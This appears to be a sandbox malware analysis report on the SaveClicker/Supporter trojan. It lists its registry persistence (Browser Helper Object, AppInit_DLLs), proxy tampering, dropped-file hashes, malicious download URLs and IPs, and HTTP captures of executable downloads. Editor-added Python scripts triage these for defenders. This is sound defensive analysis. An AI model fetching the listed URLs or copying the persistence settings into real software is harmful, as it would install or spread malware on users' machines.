[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}\TypeLib]
"Version" = "1.0"
"(Default)" = "{E2343056-CC08-46AC-B898-BFC7ACF4E755}"

[HKCU\Software\RegisteredApplicationsEx]
"71ddc4549a21476f811c4c3e6fdf3195" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"URLUpdateInfo" = ""
"URLInfoAbout" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\SaveClicker.SaveClicker.2.1]
"(Default)" = "SaveClicker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"DisplayName" = "SaveClicker"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\InprocServer32]
"(Default)" = "%Program Files%\SaveClicker\vWxdeLnb7d.dll"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}]
"(Default)" = "IRegistry"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\SaveClicker.SaveClicker.2.1\CLSID]
"(Default)" = "{23153046-D029-C7B7-DBB6-A2E4110CD348}"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\TypeLib]
"(Default)" = "{E2343056-CC08-46AC-B898-BFC7ACF4E755}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"
"_In" = "20141109"

[HKCR\SaveClicker.SaveClicker]
"(Default)" = "SaveClicker"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\TypeLib]
"(Default)" = "{E2343056-CC08-46AC-B898-BFC7ACF4E755}"

[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0\0\win32]
"(Default)" = "%Program Files%\SaveClicker\vWxdeLnb7d.tlb"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"DisplayVersion" = "3.2.0.1472"

[HKCR\SaveClicker.SaveClicker\CLSID]
"(Default)" = "{23153046-D029-C7B7-DBB6-A2E4110CD348}"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"NoModify" = "1"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}]
"(Default)" = "IPlaghinMein"

[HKCR\SaveClicker.SaveClicker\CurVer]
"(Default)" = "SaveClicker.2.1"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{23153046-D029-C7B7-DBB6-A2E4110CD348}" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"CategoryName" = "Apps"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies\Google\Chrome]
"MetricsReportingEnabled" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 21 06 12 84 D7 EF 24 5B 07 28 34 4E CC 95 D8"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}]
"(Default)" = "ILocalStorage"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\VersionIndependentProgID]
"(Default)" = "SaveClicker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"NoRepair" = "1"
"InstallDate" = "20141109"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"Publisher" = "SaveClicker"

[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0\HELPDIR]
"(Default)" = "%Program Files%\SaveClicker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"UninstallString" = "%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe /s /n /i:ExecuteCommands;UninstallCommands %Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
"(Default)" = "SaveClicker"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\ProgID]
"(Default)" = "SaveClicker.2.1"

The gzfJ2GIHr9X.exe process registers the SaveClicker COM class ({23153046-D029-C7B7-DBB6-A2E4110CD348}, whose InprocServer32 is %Program Files%\SaveClicker\vWxdeLnb7d.dll) as a Browser Helper Object (BHO), so Internet Explorer loads that DLL every time it starts. It does this by creating the following registry key and entries; "NoExplorer" = "1" keeps the BHO out of Windows Explorer, so it is loaded by Internet Explorer only:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
"(Default)" = "SaveClicker"
"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\InprocServer32]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\ProgID]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies\Google\Chrome]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\VersionIndependentProgID]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies\Google]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\Programmable]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}User]
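The persistence in this sample is spread across the two registry dumps above: 4t0K2gExXKV.exe sets AppInit_DLLs to c:\progra~1\suppor~1\suppor~1.dll and LoadAppInit_DLLs to 1 (so every process that loads user32.dll also loads that DLL), and gzfJ2GIHr9X.exe registers the SaveClicker CLSID as a Browser Helper Object and force-allows it through the IE Add-on List policy. Finding those lines among the hundreds of noise entries (CryptoAPI RNG seeds, IE cache paths, Shell Folders) is the triage problem. The following Python script is an added example written for this page, not Lavasoft's tooling: it parses the report's registry-change format (process header, operation sentence, [key], "name" = "value") and applies a small rule set of the editor's own choosing. SAMPLE is an abridged excerpt of the two sections above; the categories and descriptions are the editor's assumptions about what an analyst wants to see, not output of the analysis system.

```python
"""Parse the registry-change dump of a Lavasoft-style sandbox report and flag
the entries that matter for triage. Added example written for this page, not
Lavasoft tooling; SAMPLE is an abridged excerpt of the two sections above and
the rule list is the editor's own selection, not a complete catalogue."""
import re
from collections import namedtuple

RegEvent = namedtuple("RegEvent", "process op key name value")  # op: set | delete_key | delete_value
PROC_RE = re.compile(r"^The process (\S+) makes changes in the system registry\.")
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"$')
NAME_RE = re.compile(r'^"([^"]*)"$')

SAMPLE = r"""
The process 4t0K2gExXKV.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"DisplayName" = "Supporter 1.80"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "c:\progra~1\suppor~1\suppor~1.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 8B 59 48 55 C7 A0 4B 60 EF A9 0D 8C F0 9D 65"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process gzfJ2GIHr9X.exe:1288 makes changes in the system registry.
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{23153046-D029-C7B7-DBB6-A2E4110CD348}" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
"(Default)" = "SaveClicker"
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
"""


def parse_registry_section(text):
    # Walk the report line by line, tracking process, operation and current key.
    events, process, op, key = [], "", "set", ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := PROC_RE.match(line):
            process, op = m.group(1), "set"
        elif line.startswith("The Trojan creates and/or sets"):
            op = "set"
        elif line.startswith("The Trojan deletes the following registry key"):
            op = "delete_key"
        elif line.startswith("The Trojan deletes the following value"):
            op = "delete_value"
        elif m := KEY_RE.match(line):
            key = m.group(1)
            if op == "delete_key":
                events.append(RegEvent(process, op, key, "", ""))
        elif (m := VALUE_RE.match(line)) and op == "set":
            events.append(RegEvent(process, "set", key, m.group(1), m.group(2)))
        elif (m := NAME_RE.match(line)) and op == "delete_value":
            events.append(RegEvent(process, "delete_value", key, m.group(1), ""))
    return events  # narrative lines such as "Proxy settings are disabled:" are skipped


def triage(events):
    """(category, description, event) for the events worth a look; RNG seeds, cache paths etc. yield nothing."""
    findings, seen_bho = [], set()
    for e in events:
        k, n, v = e.key.lower(), e.name.lower(), e.value
        if e.op == "set" and k.endswith("\\windows nt\\currentversion\\windows"):
            if n == "appinit_dlls" and v:
                findings.append(("persistence", "AppInit_DLLs: %s is loaded into every user32-linked process" % v, e))
            elif n == "loadappinit_dlls" and v == "1":
                findings.append(("persistence", "LoadAppInit_DLLs=1 switches AppInit_DLLs loading on", e))
        elif e.op == "set" and "\\explorer\\browser helper objects\\{" in k:
            if e.key not in seen_bho:  # one finding per BHO, not one per value
                seen_bho.add(e.key)
                findings.append(("persistence", "BHO registered: " + e.key.rsplit("\\", 1)[1], e))
        elif e.op == "set" and "\\policies\\ext\\clsid" in k and v == "1":
            findings.append(("persistence", "IE add-on %s force-allowed by the Add-on List policy" % e.name, e))
        elif e.op == "set" and k.endswith("\\zonemap") and n in ("intranetname", "uncasintranet", "proxybypass"):
            findings.append(("browser_tamper", "Intranet zone widened: %s=%s" % (e.name, v), e))
        elif e.op == "delete_value" and k.endswith("\\internet settings") and n in ("proxyserver", "autoconfigurl", "proxyoverride"):
            findings.append(("browser_tamper", "Proxy setting removed: " + e.name, e))
        elif e.op == "set" and k.endswith("\\policies\\google\\update") and n == "updatedefault" and v == "0":
            findings.append(("defense_evasion", "Google Update disabled by policy", e))
        elif e.op == "set" and "\\currentversion\\uninstall\\" in k and n == "displayname":
            findings.append(("artifact", "Add/Remove Programs entry: " + v, e))
    return findings


if __name__ == "__main__":
    for category, text, ev in triage(parse_registry_section(SAMPLE)):
        print("%-15s %-20s %s" % (category, ev.process, text))
```

Running it prints one line per finding; the same parser can be pointed at the full report text. The values written under the HKLM\SOFTWARE\{5F189DF5-...} and HKCU\Software\AppDataLow\{5F189DF5-...} keys (usr.*, data.*, the hex-named values) are not decoded here, because the page gives neither a format nor a key for them.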

Dropped PE files

MD5                              File path
707cf330c992e956de01af4e0185473e c:\Documents and Settings\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe
2b03146531dd5016ed68d30abf45ab58 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\4t0K2gExXKV.exe
b32be388c4974d9b74f9782afeea865b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tf00294823.dll
016e2afa52b828aa94ff7c032ee3d607 c:\Program Files\SaveClicker\vWxdeLnb7d.dll
a8e1f929a0dfb4ce5a6d7d2576a53133 c:\Program Files\SaveClicker\vWxdeLnb7d.x64.dll
b32be388c4974d9b74f9782afeea865b c:\Program Files\Supporter\Supporter.dll
def1475f3f2c0ef8f462b3b4730f1d96 c:\Program Files\Supporter\SupporterSvc.dll

Note that tf00294823.dll in the user's Temp directory and c:\Program Files\Supporter\Supporter.dll share the MD5 b32be388c4974d9b74f9782afeea865b, i.e. the same binary is present in both locations; a hash-based sweep for either file should therefore cover both paths.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: AsInbuilt
Product Name: Of Hierarchic
Product Version: 1.3.4.3
Legal Copyright: Copyright 2011
Legal Trademarks:
Original Filename: TMPS.EXE
Internal Name: Of Hierarchic
File Version: 5.4.6.1
File Description: Of Hierarchic
Comments:
Language: English (United Kingdom)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             185689        185856    4.55475  b814aae66d19358199cd2211ad0eb588
.data   192512           183348        183808    4.97466  aee90c4f5926fe07a52bb09c03b1ecd7
.rsrc   376832           6564          6656      3.61584  cfeee301e73bf9a1661a7b30190aacac
.reloc  385024           6658          7168      3.43485  8f42dd784ac95c14a6e3692d6a4a89f1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://download.saveclickersoft.info/?e=savec2&clsb=1&sfx=1&prv=SaveClicker&publisher=11104&hid=14882537320847316088&cht=2&dcu=1&cpatch=2&dcs=1&pf=1 162.210.193.206
hxxp://support.saveclickersoft.info/ 104.28.1.111
hxxp://support.saveclickersoft.info/support.exe 104.28.1.111
datadownloadscan.info 95.211.159.5
time.windows.com 64.4.10.33


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /support.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Host: support.saveclickersoft.info
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36


HTTP/1.1 200 OK
Date: Sun, 09 Nov 2014 02:19:44 GMT
Content-Type: application/octet-stream
Content-Length: 5141504
Connection: keep-alive
Set-Cookie: __cfduid=dab5762686c0ddd2f2243027c9556b2ab1415499584123; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.saveclickersoft.info; HttpOnly
Last-Modified: Wed, 13 Aug 2014 11:58:05 GMT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 186686f0c9db047f-FRA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........b..E..PE..P
E..P..2PY..P..0P...P..1P...PL{[email protected]..,PH..P..6PD..P..
3PD..PRichE..P........PE..L...Y..R......................F.............
[email protected]...@.......................
..........\...<.......0 D...................M..C...................
...............P...@............................................text..
............................. ..`.rdata...........0..................@
[email protected]........ [email protected] D......"D..t.....
.........@[email protected][email protected].................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......E......E......E.
[email protected].;E.s..E..E....3E..E..E.i......E....E...U.....E.@@.
E..E.H.E..}..v..E......M.;.u..E.....3.].U..Q...E.@@.E..E.@@.E..E.H.E..
}..v4.E.....M....;.t".E.....M....;.}..M.....E......E.....3...U...E...P
.u..u..\......].U...E...P.u..u.........].U..Q.E..E....E.@@.E..E.H.E..}
..v..E.f.M.f.....E...U..3.].U.......].U...E.].U..].U..Q.}..u..e.....u.
.u..u..........E..E...U..Q.E......u..e.....u......Y.E..E...U..Q.}..u..
E..E....u..u..u..........E..E...U..Q.}..u..e.....u..E....P.u..U...

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Host: support.saveclickersoft.info
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36


HTTP/1.1 302 Moved Temporarily
Date: Sun, 09 Nov 2014 02:19:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dff2c39febf5d1fb1387cf25411e01dd71415499583997; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.saveclickersoft.info; HttpOnly
X-Powered-By: PHP/5.4.19
location: support.exe
Server: cloudflare-nginx
CF-RAY: 186686effe1f047f-FRA
0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 09 Nov 2014 02:19:44 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=dff2c39febf5d1fb1387cf25411e01dd71415499
583997; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.savecli
ckersoft.info; HttpOnly..X-Powered-By: PHP/5.4.19..location: support.e
xe..Server: cloudflare-nginx..CF-RAY: 186686effe1f047f-FRA..0..


GET /?e=savec2&clsb=1&sfx=1&prv=SaveClicker&publisher=11104&hid=14882537320847316088&cht=2&dcu=1&cpatch=2&dcs=1&pf=1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Host: download.saveclickersoft.info
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36


HTTP/1.1 200 OK
Content-Length: 2853888
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="Uqy9hDqdTY.exe"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Date: Sun, 09 Nov 2014 02:19:33 GMT
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......u..t1..'1..'
1..'..l'(..'..n'...'..o'L..'8.2'4..'1..'Q..'.8n'0..'.8r'8..'1..'3..'.8
h'0..'.8m'0..'Rich1..'........PE..L...4.^T.....................2).....
..............@...........................,....... ...@...............
...................B*.<..... ....................... .h............
[email protected]..........................
..text............................... ..`.rdata....'.......'..........
.......@[email protected]*..^...@*[email protected]......... ....
...*.............@[email protected].... ..j..." [email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
.................................................D$...t...PRQ.M.......
.....D$...t...PRQ..............D$..8.u.3..P.)...Y.....B...D$..V......B
.t.V.Y...Y..^....T$..A.;B.u...;[email protected]$..T$....H....U..QQ.u...
.u..U.R.P.............D$.;H.u...;[email protected]
.......Y..u..L.C..M.P......e...M..E......E.d.............B......QV...u
..M...E......B.t.V.y...Y.M...^d.............B..f...Q.M..M......B..M.d.
........\.C...Q.B..<...Q.e..W3.G9}.u..M.hh.C..C......u..u..%....e..
.M..}..E._d.............B......QV...u..M...E......B.t.V.....Y.M...

<<< skipped >>>
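Three things in the captures above deserve a second look. The User-Agent claims Chrome 35 on Windows NT 6.3 (Windows 8.1, WOW64) while the sample ran on a 32-bit Windows XP SP3 sandbox, so the string is hard-coded by the downloader rather than taken from an installed browser. Both hosts answer with Server: cloudflare-nginx and CF-RAY headers, so the 104.28.1.111 address in the URLs table is a Cloudflare edge node shared with unrelated sites, and the host names are the better indicators to block. And the 302 from support.saveclickersoft.info redirects straight to an executable. The Python script below is an added example written for this page, not Lavasoft's tooling: it rebuilds the three exchanges from the captures above (headers abridged, query string shortened, bodies replaced by 128-byte synthetic MZ/PE stubs because the report prints only the first bytes of the downloads) and runs the checks an analyst would script over a larger capture.

```python
"""Triage the HTTP captures in the Traffic section above. Added example for this
page, not Lavasoft tooling. CAPTURES is rebuilt from those captures with headers
abridged and the query string shortened; the bodies are synthetic 128-byte stubs
carrying only a valid MZ/PE header pair, since the report prints just the first
bytes of the real downloads."""
import re

SANDBOX_OS = "Windows NT 5.1"  # the report's "Analyzed on" field says Windows XP SP3
UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36")


def pe_stub():
    """DOS header whose e_lfanew points at a PE signature; nothing executable."""
    b = bytearray(128)
    b[0:2] = b"MZ"
    b[0x3C:0x40] = (0x40).to_bytes(4, "little")
    b[0x40:0x44] = b"PE\0\0"
    return bytes(b)


CAPTURES = [
    (b"GET /support.exe HTTP/1.1\r\nHost: support.saveclickersoft.info\r\n"
     b"User-Agent: " + UA.encode() + b"\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
     b"Content-Length: 5141504\r\nServer: cloudflare-nginx\r\n\r\n" + pe_stub()),
    (b"GET / HTTP/1.1\r\nHost: support.saveclickersoft.info\r\n"
     b"User-Agent: " + UA.encode() + b"\r\n\r\n",
     b"HTTP/1.1 302 Moved Temporarily\r\nContent-Type: text/html\r\n"
     b"location: support.exe\r\nServer: cloudflare-nginx\r\n\r\n0\r\n"),
    (b"GET /?e=savec2&prv=SaveClicker&publisher=11104 HTTP/1.1\r\n"
     b"Host: download.saveclickersoft.info\r\nUser-Agent: " + UA.encode() + b"\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nContent-Length: 2853888\r\n"
     b"Content-Type: application/octet-stream\r\n"
     b'Content-Disposition: attachment; filename="Uqy9hDqdTY.exe"\r\n\r\n' + pe_stub()),
]


def parse_http(raw):
    """Split one HTTP message into (start line, {lower-cased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_pe(body):
    """True when a DOS stub's e_lfanew really lands on a PE signature."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(body[0x3C:0x40], "little")
    return body[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage_exchange(req_raw, resp_raw, sandbox_os=SANDBOX_OS):
    """Return (rule, detail) pairs for one request/response pair."""
    _, req_h, _ = parse_http(req_raw)
    status_line, resp_h, body = parse_http(resp_raw)
    findings = []
    # Hard-coded User-Agent: a Chrome 35 / Windows 8.1 string sent from an XP box.
    m = re.search(r"Windows NT \d+\.\d+", req_h.get("user-agent", ""))
    if m and m.group(0) != sandbox_os:
        findings.append(("ua_mismatch", "%s claimed, sandbox is %s" % (m.group(0), sandbox_os)))
    # Executable in the body, whatever Content-Type claims.
    if is_pe(body):
        findings.append(("pe_download", resp_h.get("content-type", "?")))
    elif body[:2] == b"MZ":
        findings.append(("mz_only", "MZ seen, capture too short to check the PE header"))
    # Server-suggested file name ending in .exe.
    fn = re.search(r'filename="?([^";]+)', resp_h.get("content-disposition", ""))
    if fn and fn.group(1).lower().endswith(".exe"):
        findings.append(("exe_attachment", fn.group(1)))
    # 3xx whose target is an executable (here a relative Location, "support.exe").
    status = status_line.split(" ")[1] if " " in status_line else ""
    loc = resp_h.get("location", "")
    if status.startswith("3") and loc.lower().endswith(".exe"):
        findings.append(("redirect_to_executable", loc))
    # CDN-fronted origin: the IP in the URLs table is an edge node, so block by host name.
    if resp_h.get("server", "").startswith("cloudflare"):
        findings.append(("cdn_fronted", resp_h["server"]))
    return findings


def extract_urls(captures):
    """Host + path of every request: the list an analyst would block or hunt for."""
    urls = set()
    for req_raw, _ in captures:
        req_line, req_h, _ = parse_http(req_raw)
        urls.add(req_h.get("host", "") + req_line.split(" ")[1])
    return sorted(urls)


if __name__ == "__main__":
    for req, resp in CAPTURES:
        print(parse_http(req)[0])
        for rule, detail in triage_exchange(req, resp):
            print("   %-24s %s" % (rule, detail))
    print(extract_urls(CAPTURES))
```

The MZ/PE check is deliberately stricter than "starts with MZ": on a truncated capture like the ones printed above it reports mz_only instead of pe_download, which tells the analyst to go back to the full pcap before treating the body as a dropped binary.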

The Trojan connects to the servers at the following location(s): see the URLs table above.

Strings from Dumps

%original file name%.exe_1904:

.text
`.data
.rsrc
@.reloc
.fff.
L$T~.fffff.
C".Uc?(
Lto.hx
)1mSg~j
.ya6N
S.fh?r
&MQ4%X0J
%uuJo
€u>
D(.ug
M%s6~
L}'.Xn
.eLkg
.cg"_
{0xx, 0xx}
zcÁ
1.0.6, 6-Sept-2010
combined CRCs: stored = 0xx, computed = 0xx
` C %d work, %d block, ratio %5.2f
od bytes: mapping %d,
6Rselectors %d,
c,, %d pointers, %d sorted, %d scanned
final combined CRC = 0xx
%d in block, %d after MTF & 1-2 coding, %d 2 syms in use
[%d: huff mtf
depth m has
GetProcessWindowStation
codes %d
_A_EDD block %d: crc = 0xx, combined CRC = 0xx, size = %d
b pass %d: size is %d, grp uses are
code lengths %d,
qsort [0x%x, 0x%x] done %d this %d
bzip2/libbzip2: internal error number %d.
This is a bug in bzip2/libbzip2, %s.
Please report it to me at: [email protected]. If this happened
component, you should also report this bug to the author(s)
of that program. Please make an effort to report this bug;
timely and accurate bug reports eventually lead to higher
.AI= s s
m unresolved strings
Y@ initial group %d, [%d .. %d], has %d syms (%4.1f%%)
(VVV.memtest86.com). At the time of writing it is free (GPLd).
rr.aOvi H
c:\%original file name%.exe
GetProcessHeap
KERNEL32.dll
GetCPInfo
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />
